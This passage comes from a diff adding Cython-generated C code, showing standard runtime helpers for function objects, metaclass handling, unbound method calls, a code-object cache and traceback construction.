*)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* Py3UpdateBases */ +static PyObject* +__Pyx_PEP560_update_bases(PyObject *bases) +{ + Py_ssize_t i, j, size_bases; + PyObject *base, *meth, *new_base, *result, *new_bases = NULL; + size_bases = PyTuple_GET_SIZE(bases); + for (i = 0; i < size_bases; i++) { + base = PyTuple_GET_ITEM(bases, i); + if (PyType_Check(base)) { + if (new_bases) { + if (PyList_Append(new_bases, base) < 0) { + goto error; + } + } + continue; + } + meth = __Pyx_PyObject_GetAttrStrNoError(base, __pyx_n_s_mro_entries); + if (!meth && PyErr_Occurred()) { + goto error; + } + if (!meth) { + if (new_bases) { + if (PyList_Append(new_bases, base) < 0) { + goto error; + } + } + continue; + } + new_base = __Pyx_PyObject_CallOneArg(meth, bases); + Py_DECREF(meth); + if (!new_base) { + goto error; + } + if (!PyTuple_Check(new_base)) { + PyErr_SetString(PyExc_TypeError, + "__mro_entries__ must return a tuple"); + Py_DECREF(new_base); + goto error; + } + if (!new_bases) { + if (!(new_bases = PyList_New(i))) { + goto error; + } + for (j = 0; j < i; j++) { + base = PyTuple_GET_ITEM(bases, j); + PyList_SET_ITEM(new_bases, j, base); + Py_INCREF(base); + } + } + j = PyList_GET_SIZE(new_bases); + if (PyList_SetSlice(new_bases, j, j, new_base) < 0) { + goto error; + } + Py_DECREF(new_base); + } + if (!new_bases) { + Py_INCREF(bases); + return bases; + } + result = PyList_AsTuple(new_bases); + Py_DECREF(new_bases); + return result; +error: + Py_XDECREF(new_bases); + return NULL; +} + +/* SetNewInClass */ +static int __Pyx_SetNewInClass(PyObject *ns, PyObject *name, PyObject *value) { +#ifdef __Pyx_CyFunction_USED + int ret; + if (__Pyx_CyFunction_Check(value)) { + PyObject *staticnew = PyStaticMethod_New(value); + if (unlikely(!staticnew)) return -1; + ret = __Pyx_SetNameInClass(ns, name, staticnew); + Py_DECREF(staticnew); + return ret; + } +#endif + return __Pyx_SetNameInClass(ns, name, value); +} + +/* CalculateMetaclass */ +static PyObject *__Pyx_CalculateMetaclass(PyTypeObject *metaclass, PyObject *bases) { + Py_ssize_t i, nbases = PyTuple_GET_SIZE(bases); + for (i=0; i < nbases; i++) { + PyTypeObject *tmptype; + PyObject *tmp = PyTuple_GET_ITEM(bases, i); + tmptype = Py_TYPE(tmp); +#if PY_MAJOR_VERSION < 3 + if (tmptype == &PyClass_Type) + continue; +#endif + if (!metaclass) { + metaclass = tmptype; + continue; + } + if (PyType_IsSubtype(metaclass, tmptype)) + continue; + if (PyType_IsSubtype(tmptype, metaclass)) { + metaclass = tmptype; + continue; + } + PyErr_SetString(PyExc_TypeError, + "metaclass conflict: " + "the metaclass of a derived class " + "must be a (non-strict) subclass " + "of the metaclasses of all its bases"); + return NULL; + } + if (!metaclass) { +#if PY_MAJOR_VERSION < 3 + metaclass = &PyClass_Type; +#else + metaclass = &PyType_Type; +#endif + } + Py_INCREF((PyObject*) metaclass); + return (PyObject*) metaclass; +} + +/* PyObjectCall2Args */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2) { + PyObject *args[3] = {NULL, arg1, arg2}; + return __Pyx_PyObject_FastCall(function, args+1, 2 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectLookupSpecial */ +#if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error) { + PyObject *res; + PyTypeObject *tp = Py_TYPE(obj); +#if PY_MAJOR_VERSION < 3 + if (unlikely(PyInstance_Check(obj))) + return with_error ? __Pyx_PyObject_GetAttrStr(obj, attr_name) : __Pyx_PyObject_GetAttrStrNoError(obj, attr_name); +#endif + res = _PyType_Lookup(tp, attr_name); + if (likely(res)) { + descrgetfunc f = Py_TYPE(res)->tp_descr_get; + if (!f) { + Py_INCREF(res); + } else { + res = f(res, obj, (PyObject *)tp); + } + } else if (with_error) { + PyErr_SetObject(PyExc_AttributeError, attr_name); + } + return res; +} +#endif + +/* Py3ClassCreate */ +static PyObject *__Pyx_Py3MetaclassPrepare(PyObject *metaclass, PyObject *bases, PyObject *name, + PyObject *qualname, PyObject *mkw, PyObject *modname, PyObject *doc) { + PyObject *ns; + if (metaclass) { + PyObject *prep = __Pyx_PyObject_GetAttrStrNoError(metaclass, __pyx_n_s_prepare); + if (prep) { + PyObject *pargs[3] = {NULL, name, bases}; + ns = __Pyx_PyObject_FastCallDict(prep, pargs+1, 2 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET, mkw); + Py_DECREF(prep); + } else { + if (unlikely(PyErr_Occurred())) + return NULL; + ns = PyDict_New(); + } + } else { + ns = PyDict_New(); + } + if (unlikely(!ns)) + return NULL; + if (unlikely(PyObject_SetItem(ns, __pyx_n_s_module, modname) < 0)) goto bad; +#if PY_VERSION_HEX >= 0x03030000 + if (unlikely(PyObject_SetItem(ns, __pyx_n_s_qualname, qualname) < 0)) goto bad; +#else + CYTHON_MAYBE_UNUSED_VAR(qualname); +#endif + if (unlikely(doc && PyObject_SetItem(ns, __pyx_n_s_doc, doc) < 0)) goto bad; + return ns; +bad: + Py_DECREF(ns); + return NULL; +} +#if PY_VERSION_HEX < 0x030600A4 && CYTHON_PEP487_INIT_SUBCLASS +static int __Pyx_SetNamesPEP487(PyObject *type_obj) { + PyTypeObject *type = (PyTypeObject*) type_obj; + PyObject *names_to_set, *key, *value, *set_name, *tmp; + Py_ssize_t i = 0; +#if CYTHON_USE_TYPE_SLOTS + names_to_set = PyDict_Copy(type->tp_dict); +#else + { + PyObject *d = PyObject_GetAttr(type_obj, __pyx_n_s_dict); + names_to_set = NULL; + if (likely(d)) { + PyObject *names_to_set = PyDict_New(); + int ret = likely(names_to_set) ? PyDict_Update(names_to_set, d) : -1; + Py_DECREF(d); + if (unlikely(ret < 0)) + Py_CLEAR(names_to_set); + } + } +#endif + if (unlikely(names_to_set == NULL)) + goto bad; + while (PyDict_Next(names_to_set, &i, &key, &value)) { + set_name = __Pyx_PyObject_LookupSpecialNoError(value, __pyx_n_s_set_name); + if (unlikely(set_name != NULL)) { + tmp = __Pyx_PyObject_Call2Args(set_name, type_obj, key); + Py_DECREF(set_name); + if (unlikely(tmp == NULL)) { + __Pyx_TypeName value_type_name = + __Pyx_PyType_GetName(Py_TYPE(value)); + __Pyx_TypeName type_name = __Pyx_PyType_GetName(type); + PyErr_Format(PyExc_RuntimeError, +#if PY_MAJOR_VERSION >= 3 + "Error calling __set_name__ on '" __Pyx_FMT_TYPENAME "' instance %R " "in '" __Pyx_FMT_TYPENAME "'", + value_type_name, key, type_name); +#else + "Error calling __set_name__ on '" __Pyx_FMT_TYPENAME "' instance %.100s in '" __Pyx_FMT_TYPENAME "'", + value_type_name, + PyString_Check(key) ? PyString_AS_STRING(key) : "?", + type_name); +#endif + goto bad; + } else { + Py_DECREF(tmp); + } + } + else if (unlikely(PyErr_Occurred())) { + goto bad; + } + } + Py_DECREF(names_to_set); + return 0; +bad: + Py_XDECREF(names_to_set); + return -1; +} +static PyObject *__Pyx_InitSubclassPEP487(PyObject *type_obj, PyObject *mkw) { +#if CYTHON_USE_TYPE_SLOTS && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyTypeObject *type = (PyTypeObject*) type_obj; + PyObject *mro = type->tp_mro; + Py_ssize_t i, nbases; + if (unlikely(!mro)) goto done; + (void) &__Pyx_GetBuiltinName; + Py_INCREF(mro); + nbases = PyTuple_GET_SIZE(mro); + assert(PyTuple_GET_ITEM(mro, 0) == type_obj); + for (i = 1; i < nbases-1; i++) { + PyObject *base, *dict, *meth; + base = PyTuple_GET_ITEM(mro, i); + dict = ((PyTypeObject *)base)->tp_dict; + meth = __Pyx_PyDict_GetItemStrWithError(dict, __pyx_n_s_init_subclass); + if (unlikely(meth)) { + descrgetfunc f = Py_TYPE(meth)->tp_descr_get; + PyObject *res; + Py_INCREF(meth); + if (likely(f)) { + res = f(meth, NULL, type_obj); + Py_DECREF(meth); + if (unlikely(!res)) goto bad; + meth = res; + } + res = __Pyx_PyObject_FastCallDict(meth, NULL, 0, mkw); + Py_DECREF(meth); + if (unlikely(!res)) goto bad; + Py_DECREF(res); + goto done; + } else if (unlikely(PyErr_Occurred())) { + goto bad; + } + } +done: + Py_XDECREF(mro); + return type_obj; +bad: + Py_XDECREF(mro); + Py_DECREF(type_obj); + return NULL; +#else + PyObject *super_type, *super, *func, *res; +#if CYTHON_COMPILING_IN_PYPY && !defined(PySuper_Type) + super_type = __Pyx_GetBuiltinName(__pyx_n_s_super); +#else + super_type = (PyObject*) &PySuper_Type; + (void) &__Pyx_GetBuiltinName; +#endif + super = likely(super_type) ? __Pyx_PyObject_Call2Args(super_type, type_obj, type_obj) : NULL; +#if CYTHON_COMPILING_IN_PYPY && !defined(PySuper_Type) + Py_XDECREF(super_type); +#endif + if (unlikely(!super)) { + Py_CLEAR(type_obj); + goto done; + } + func = __Pyx_PyObject_GetAttrStrNoError(super, __pyx_n_s_init_subclass); + Py_DECREF(super); + if (likely(!func)) { + if (unlikely(PyErr_Occurred())) + Py_CLEAR(type_obj); + goto done; + } + res = __Pyx_PyObject_FastCallDict(func, NULL, 0, mkw); + Py_DECREF(func); + if (unlikely(!res)) + Py_CLEAR(type_obj); + Py_XDECREF(res); +done: + return type_obj; +#endif +} +#endif +static PyObject *__Pyx_Py3ClassCreate(PyObject *metaclass, PyObject *name, PyObject *bases, + PyObject *dict, PyObject *mkw, + int calculate_metaclass, int allow_py2_metaclass) { + PyObject *result; + PyObject *owned_metaclass = NULL; + PyObject *margs[4] = {NULL, name, bases, dict}; + if (allow_py2_metaclass) { + owned_metaclass = PyObject_GetItem(dict, __pyx_n_s_metaclass); + if (owned_metaclass) { + metaclass = owned_metaclass; + } else if (likely(PyErr_ExceptionMatches(PyExc_KeyError))) { + PyErr_Clear(); + } else { + return NULL; + } + } + if (calculate_metaclass && (!metaclass || PyType_Check(metaclass))) { + metaclass = __Pyx_CalculateMetaclass((PyTypeObject*) metaclass, bases); + Py_XDECREF(owned_metaclass); + if (unlikely(!metaclass)) + return NULL; + owned_metaclass = metaclass; + } + result = __Pyx_PyObject_FastCallDict(metaclass, margs+1, 3 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET, +#if PY_VERSION_HEX < 0x030600A4 + (metaclass == (PyObject*)&PyType_Type) ? NULL : mkw +#else + mkw +#endif + ); + Py_XDECREF(owned_metaclass); +#if PY_VERSION_HEX < 0x030600A4 && CYTHON_PEP487_INIT_SUBCLASS + if (likely(result) && likely(PyType_Check(result))) { + if (unlikely(__Pyx_SetNamesPEP487(result) < 0)) { + Py_CLEAR(result); + } else { + result = __Pyx_InitSubclassPEP487(result, mkw); + } + } +#else + (void) &__Pyx_GetBuiltinName; +#endif + return result; +} + +/* Globals */ +static PyObject* __Pyx_Globals(void) { + return __Pyx_NewRef(__pyx_d); +} + +/* UnpackUnboundCMethod */ +static PyObject *__Pyx_SelflessCall(PyObject *method, PyObject *args, PyObject *kwargs) { + PyObject *selfless_args = PyTuple_GetSlice(args, 1, PyTuple_Size(args)); + if (unlikely(!selfless_args)) return NULL; + PyObject *result = PyObject_Call(method, selfless_args, kwargs); + Py_DECREF(selfless_args); + return result; +} +static PyMethodDef __Pyx_UnboundCMethod_Def = { + "CythonUnboundCMethod", + __PYX_REINTERPRET_FUNCION(PyCFunction, __Pyx_SelflessCall), + METH_VARARGS | METH_KEYWORDS, + NULL +}; +static int __Pyx_TryUnpackUnboundCMethod(__Pyx_CachedCFunction* target) { + PyObject *method; + method = __Pyx_PyObject_GetAttrStr(target->type, *target->method_name); + if (unlikely(!method)) + return -1; + target->method = method; +#if CYTHON_COMPILING_IN_CPYTHON + #if PY_MAJOR_VERSION >= 3 + if (likely(__Pyx_TypeCheck(method, &PyMethodDescr_Type))) + #else + if (likely(!PyCFunction_Check(method))) + #endif + { + PyMethodDescrObject *descr = (PyMethodDescrObject*) method; + target->func = descr->d_method->ml_meth; + target->flag = descr->d_method->ml_flags & ~(METH_CLASS | METH_STATIC | METH_COEXIST | METH_STACKLESS); + } else +#endif +#if defined(CYTHON_COMPILING_IN_PYPY) +#elif PY_VERSION_HEX >= 0x03090000 + if (PyCFunction_CheckExact(method)) +#else + if (PyCFunction_Check(method)) +#endif + { + PyObject *self; + int self_found; +#if CYTHON_COMPILING_IN_LIMITED_API || CYTHON_COMPILING_IN_PYPY + self = PyObject_GetAttrString(method, "__self__"); + if (!self) { + PyErr_Clear(); + } +#else + self = PyCFunction_GET_SELF(method); +#endif + self_found = (self && self != Py_None); +#if CYTHON_COMPILING_IN_LIMITED_API || CYTHON_COMPILING_IN_PYPY + Py_XDECREF(self); +#endif + if (self_found) { + PyObject *unbound_method = PyCFunction_New(&__Pyx_UnboundCMethod_Def, method); + if (unlikely(!unbound_method)) return -1; + Py_DECREF(method); + target->method = unbound_method; + } + } + return 0; +} + +/* CallUnboundCMethod1 */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg) { + if (likely(cfunc->func)) { + int flag = cfunc->flag; + if (flag == METH_O) { + return (*(cfunc->func))(self, arg); + } else if ((PY_VERSION_HEX >= 0x030600B1) && flag == METH_FASTCALL) { + #if PY_VERSION_HEX >= 0x030700A0 + return (*(__Pyx_PyCFunctionFast)(void*)(PyCFunction)cfunc->func)(self, &arg, 1); + #else + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, &arg, 1, NULL); + #endif + } else if ((PY_VERSION_HEX >= 0x030700A0) && flag == (METH_FASTCALL | METH_KEYWORDS)) { + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, &arg, 1, NULL); + } + } + return __Pyx__CallUnboundCMethod1(cfunc, self, arg); +} +#endif +static PyObject* __Pyx__CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg){ + PyObject *args, *result = NULL; + if (unlikely(!cfunc->func && !cfunc->method) && unlikely(__Pyx_TryUnpackUnboundCMethod(cfunc) < 0)) return NULL; +#if CYTHON_COMPILING_IN_CPYTHON + if (cfunc->func && (cfunc->flag & METH_VARARGS)) { + args = PyTuple_New(1); + if (unlikely(!args)) goto bad; + Py_INCREF(arg); + PyTuple_SET_ITEM(args, 0, arg); + if (cfunc->flag & METH_KEYWORDS) + result = (*(PyCFunctionWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, NULL); + else + result = (*cfunc->func)(self, args); + } else { + args = PyTuple_New(2); + if (unlikely(!args)) goto bad; + Py_INCREF(self); + PyTuple_SET_ITEM(args, 0, self); + Py_INCREF(arg); + PyTuple_SET_ITEM(args, 1, arg); + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); + } +#else + args = PyTuple_Pack(2, self, arg); + if (unlikely(!args)) goto bad; + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); +#endif +bad: + Py_XDECREF(args); + return result; +} + +/* CallUnboundCMethod2 */ +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030600B1 +static CYTHON_INLINE PyObject *__Pyx_CallUnboundCMethod2(__Pyx_CachedCFunction *cfunc, PyObject *self, PyObject *arg1, PyObject *arg2) { + if (likely(cfunc->func)) { + PyObject *args[2] = {arg1, arg2}; + if (cfunc->flag == METH_FASTCALL) { + #if PY_VERSION_HEX >= 0x030700A0 + return (*(__Pyx_PyCFunctionFast)(void*)(PyCFunction)cfunc->func)(self, args, 2); + #else + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, 2, NULL); + #endif + } + #if PY_VERSION_HEX >= 0x030700A0 + if (cfunc->flag == (METH_FASTCALL | METH_KEYWORDS)) + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, 2, NULL); + #endif + } + return __Pyx__CallUnboundCMethod2(cfunc, self, arg1, arg2); +} +#endif +static PyObject* __Pyx__CallUnboundCMethod2(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg1, PyObject* arg2){ + PyObject *args, *result = NULL; + if (unlikely(!cfunc->func && !cfunc->method) && unlikely(__Pyx_TryUnpackUnboundCMethod(cfunc) < 0)) return NULL; +#if CYTHON_COMPILING_IN_CPYTHON + if (cfunc->func && (cfunc->flag & METH_VARARGS)) { + args = PyTuple_New(2); + if (unlikely(!args)) goto bad; + Py_INCREF(arg1); + PyTuple_SET_ITEM(args, 0, arg1); + Py_INCREF(arg2); + PyTuple_SET_ITEM(args, 1, arg2); + if (cfunc->flag & METH_KEYWORDS) + result = (*(PyCFunctionWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, NULL); + else + result = (*cfunc->func)(self, args); + } else { + args = PyTuple_New(3); + if (unlikely(!args)) goto bad; + Py_INCREF(self); + PyTuple_SET_ITEM(args, 0, self); + Py_INCREF(arg1); + PyTuple_SET_ITEM(args, 1, arg1); + Py_INCREF(arg2); + PyTuple_SET_ITEM(args, 2, arg2); + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); + } +#else + args = PyTuple_Pack(3, self, arg1, arg2); + if (unlikely(!args)) goto bad; + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); +#endif +bad: + Py_XDECREF(args); + return result; +} + +/* dict_getitem_default */ +static PyObject* __Pyx_PyDict_GetItemDefault(PyObject* d, PyObject* key, PyObject* default_value) { + PyObject* value; +#if PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) + value = PyDict_GetItemWithError(d, key); + if (unlikely(!value)) { + if (unlikely(PyErr_Occurred())) + return NULL; + value = default_value; + } + Py_INCREF(value); + if ((1)); +#else + if (PyString_CheckExact(key) || PyUnicode_CheckExact(key) || PyInt_CheckExact(key)) { + value = PyDict_GetItem(d, key); + if (unlikely(!value)) { + value = default_value; + } + Py_INCREF(value); + } +#endif + else { + if (default_value == Py_None) + value = __Pyx_CallUnboundCMethod1(&__pyx_umethod_PyDict_Type_get, d, key); + else + value = __Pyx_CallUnboundCMethod2(&__pyx_umethod_PyDict_Type_get, d, key, default_value); + } + return value; +} + +/* GetNameInClass */ +static PyObject *__Pyx__GetNameInClass(PyObject *nmspace, PyObject *name) { + PyObject *result; + PyObject *dict; + assert(PyType_Check(nmspace)); +#if CYTHON_USE_TYPE_SLOTS + dict = ((PyTypeObject*)nmspace)->tp_dict; + Py_XINCREF(dict); +#else + dict = PyObject_GetAttr(nmspace, __pyx_n_s_dict); +#endif + if (likely(dict)) { + result = PyObject_GetItem(dict, name); + Py_DECREF(dict); + if (result) { + return result; + } + } + PyErr_Clear(); + __Pyx_GetModuleGlobalNameUncached(result, name); + return result; +} + +/* CLineInTraceback */ +#ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ +#include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + 